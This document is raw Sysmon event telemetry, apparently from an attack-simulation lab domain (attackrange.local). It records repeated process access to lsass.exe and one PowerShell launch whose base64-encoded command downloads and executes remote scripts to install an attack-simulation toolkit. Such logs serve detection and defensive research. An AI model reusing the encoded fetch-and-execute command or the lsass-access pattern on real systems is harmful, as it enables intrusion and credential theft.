13:54:15.045{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003833Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.045{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003832Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.045{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003831Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.045{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003830Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.045{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003975Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.278{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003974Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.278{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003973Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.247{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4pbbhd2y.owo.ps12020-12-08 13:54:16.247 10341000x80000000000000003972Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.231{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003971Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.216{10ACEC4A-8587-5FCF-C100-000000009101}46044492C:\Windows\system32\conhost.exe{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003970Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.216{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003969Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.216{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003968Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.216{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003967Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.216{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003966Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.216{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003965Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.216{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003964Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.216{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003963Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.216{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003962Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.216{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003961Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.216{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003960Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.216{10ACEC4A-8587-5FCF-C400-000000009101}4432744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF819029210) 154100x80000000000000003959Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.218{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8587-5FCF-624B-070000000000}0x74b620HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8587-5FCF-C400-000000009101}4432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003958Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 